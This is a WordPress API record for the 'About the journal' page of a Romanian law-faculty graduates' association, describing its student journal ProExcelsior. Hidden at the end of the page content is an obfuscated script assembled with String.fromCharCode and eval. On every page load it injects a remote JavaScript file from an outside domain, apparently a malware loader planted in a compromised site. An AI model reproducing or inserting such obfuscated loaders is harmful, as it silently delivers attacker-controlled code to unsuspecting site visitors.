{"id":2,"date":"2009-11-17T02:43:30","date_gmt":"2009-11-17T00:43:30","guid":{"rendered":"http:\/\/aafdutm.ro\/revista\/?page_id=2"},"modified":"2012-03-11T15:33:55","modified_gmt":"2012-03-11T13:33:55","slug":"despre-revista","status":"publish","type":"page","link":"https:\/\/www.aafdutm.ro\/revista\/despre-revista\/","title":{"rendered":"Despre revist\u0103"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Revista este dedicat\u0103 studen\u021bilor, absolven\u021bilor \u015fi membrilor din cadrul Asocia\u021biei. \u00cen primul num\u0103r al revistei sunt publicate toate lucr\u0103rile studen\u021bilor care au participat la Comunic\u0103rile \u0218tiin\u021bifice din cadru Facult\u0103\u021bii de Drept. Asocia\u021bia \u00ee\u0219i propune ca sa publice lucr\u0103rile cele mai bune si de la celelalte facult\u0103\u021bi din cadrul Universit\u0103\u021bii. <\/span><span style=\"color: #000000;\"><span style=\"color: #000000;\">Editarea revistei<\/span> \u201e<strong><span style=\"color: #ff0000;\">ProExcelsior<\/span><\/strong>\u201d <span style=\"color: #000000;\">de c\u0103tre Asocia\u021bia Absolven\u021bilor Facult\u0103\u021bii de Drept a Universit\u0103\u021bii Titu Maiorescu reprezinta un pas important \u00een direc\u021bia valorific\u0103rii crea\u021biei \u0219tiin\u021bifice studen\u021be\u0219ti din domeniul Dreptului public \u0219i Dreptului privat. Comunic\u0103rile studen\u021bilor poarta \u0219i amprenta personalit\u0103\u021bii \u00eendrum\u0103torilor \u0219tiin\u021bifici, prestigioase cadre didactice ale Facult\u0103\u021bii de Drept, fiind, \u00een consecin\u021ba, o proba a calit\u0103\u021bii si anvergurii actului de cunoa\u0219tere cultivat la Universitatea Titu Maiorescu.<\/span><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Asocia\u021bia \u0219i-a mai realizat \u00eenc\u0103 un obiectiv propus, acela de a edita o revista periodica de specialitate.<\/span><\/p>\n<p><span style=\"color: #000000;\"> <strong><span style=\"color: #ff0000;\">Revista ProExcelsior<\/span><\/strong> <span style=\"color: #000000;\">va fi publicata \u00eentr-un num\u0103r de 100 de exemplare.<\/span><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>Cu cele mai c\u0103lduroase g\u00e2nduri,<br \/>\nPre\u0219edinte<br \/>\nMarius Idita<\/strong><\/span><\/p>\n<p><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Revista este dedicat\u0103 studen\u021bilor, absolven\u021bilor \u015fi membrilor din cadrul Asocia\u021biei. \u00cen primul num\u0103r al revistei sunt publicate toate lucr\u0103rile studen\u021bilor care au participat la Comunic\u0103rile \u0218tiin\u021bifice din cadru Facult\u0103\u021bii de Drept. Asocia\u021bia \u00ee\u0219i propune ca sa publice lucr\u0103rile cele mai bune si de la celelalte facult\u0103\u021bi din cadrul Universit\u0103\u021bii. Editarea revistei \u201eProExcelsior\u201d de c\u0103tre Asocia\u021bia [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/pages\/2"}],"collection":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/comments?post=2"}],"version-history":[{"count":6,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/pages\/2\/revisions"}],"predecessor-version":[{"id":61,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/pages\/2\/revisions\/61"}],"wp:attachment":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/media?parent=2"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}